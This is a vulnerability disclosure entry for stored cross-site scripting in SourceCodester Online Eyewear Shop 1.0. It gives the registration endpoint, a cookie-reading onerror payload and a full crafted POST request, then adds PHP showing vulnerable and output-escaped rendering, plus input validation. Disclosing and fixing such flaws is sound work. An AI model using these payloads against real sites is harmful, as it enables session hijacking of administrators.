| Title | SourceCodester Online Eyewear Shop 1.0 Cross-Site Scripting |
|---|---|

Description: The application Online Eyewear Shop 1.0 is vulnerable to Stored Cross-Site Scripting attacks.
The vulnerability is triggered by sending a specially crafted POST request as a customer user to the following URL:
- http://localhost/oews/classes/Users.php?f=registration
The vulnerable function corresponds to "registration" within the following source code file:
- oews/classes/Users.php
This function allows registering a new customer user or editing an existing one. The application does not correctly sanitize the user-supplied input, so the XSS payload
"><img src=X onerror=prompt(document.cookie)>
can be stored through any of the following parameters:
- "firstname"
- "middlename"
- "lastname"
- "email"
- "contact"
Here is an example of the POST request:
```http
POST /oews/classes/Users.php?f=registration HTTP/1.1
Host: localhost
Content-Type: multipart/form-data; boundary=---------------------------110352294825610921354088773808
Content-Length: 1274
Connection: close
Cookie: PHPSESSID=lmpi80mm6i466es8arcrfj78vo

-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="id"

4
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="firstname"

XSS"><img src=X onerror=prompt(1)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="middlename"

"><img src=X onerror=prompt(2)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="lastname"

TEST"><img src=X onerror=prompt(3)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="gender"

Male
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="email"

[email protected]"><img src=X onerror=prompt(5)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="contact"

444"><img src=X onerror=prompt(6)>
-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="password"


-----------------------------110352294825610921354088773808
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------110352294825610921354088773808--
```
This information is stored in the database for the current user, and the script is executed every time the related fields are printed out on the website. For this reason, any administrator user is a potential victim of this attack if they try to edit that customer or simply open the "Customer List View". This view (located at the URL "http://localhost/oews/admin/?page=customers") shows the values of the following fields:
- First Name
- Middle Name
- Last Name
- Email
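The root cause described above is that stored registration fields are written into HTML without output encoding. The following PHP is an added example written for this page, not code from the Online Eyewear Shop project: it places the vulnerable rendering pattern beside a hardened version that HTML-escapes every field on output, and adds input validation for the registration side as defence in depth. The `$customer` array is a constructed sample of what the admin "Customer List View" would read back from the database after the request above; the function names `e`, `render_row_vulnerable`, `render_row_safe` and `validate_registration` are assumptions for this example and do not exist in the project.

```php
<?php
// Added example, not code from the Online Eyewear Shop project.
// Constructed sample: the stored values an admin list view would read back
// from the database after the stored-XSS registration request.
$customer = [
    'firstname'  => 'XSS"><img src=X onerror=prompt(1)>',
    'middlename' => '"><img src=X onerror=prompt(2)>',
    'lastname'   => 'TEST"><img src=X onerror=prompt(3)>',
    'email'      => 'user@example.invalid"><img src=X onerror=prompt(5)>', // placeholder address
    'contact'    => '444"><img src=X onerror=prompt(6)>',
];

// Vulnerable pattern (hypothetical, mirrors the behaviour described in the
// advisory): the stored value is concatenated straight into the HTML page,
// so any markup saved at registration time becomes live markup for the admin.
function render_row_vulnerable(array $c): string
{
    return '<td>' . $c['firstname'] . '</td>'
         . '<td>' . $c['middlename'] . '</td>'
         . '<td>' . $c['lastname'] . '</td>'
         . '<td>' . $c['email'] . '</td>';
}

// Output-encoding helper for HTML text nodes and double-quoted attribute values.
// ENT_QUOTES escapes both quote characters, ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string (which would silently drop data).
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened rendering: identical layout, every stored field passed through e()
// at the moment it is written into HTML. The < > " ' characters of the stored
// payload are emitted as entities and the browser shows them as inert text.
function render_row_safe(array $c): string
{
    return '<td>' . e($c['firstname']) . '</td>'
         . '<td>' . e($c['middlename']) . '</td>'
         . '<td>' . e($c['lastname']) . '</td>'
         . '<td>' . e($c['email']) . '</td>';
}

// Registration-side validation (defence in depth, not the primary fix): reject
// values that cannot be a name, e-mail address or phone number before storing
// them. Returns a list of error messages; an empty list means the input passed.
function validate_registration(array $post): array
{
    $errors = [];
    foreach (['firstname', 'middlename', 'lastname'] as $field) {
        if (isset($post[$field]) && preg_match('/[<>"\']/', $post[$field])) {
            $errors[] = "$field contains characters not allowed in a name";
        }
    }
    if (!isset($post['email']) || filter_var($post['email'], FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email is not a valid address';
    }
    if (!isset($post['contact']) || !preg_match('/^\+?[0-9 ]{5,20}$/', $post['contact'])) {
        $errors[] = 'contact must be a phone number';
    }
    return $errors;
}

// Compare the two renderings of the same stored row, then run the validator
// over the same values as if they had just arrived in the registration POST.
echo render_row_vulnerable($customer), "\n";
echo render_row_safe($customer), "\n";
print_r(validate_registration($customer));
```

Escaping belongs at the output boundary because the same stored string may later be rendered in several places (the customer edit form, the list view, e-mails); validating at registration only narrows what reaches the database and does not protect data that is already stored or that arrives through another code path.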

| Field | Value |
|---|---|
| User | CP_offensive_team (UID 40465) |
| Submission | 07/02/2023 18:07 (3 years ago) |
| Moderation | 07/02/2023 20:59 (3 hours later) |
| Status | Accepted |
| VulDB Entry | 220369 [SourceCodester Online Eyewear Shop 1.0 POST Request oews/classes/Users.php registration firstname/middlename/lastname/email/contact cross site scripting] |
| Points | 17 |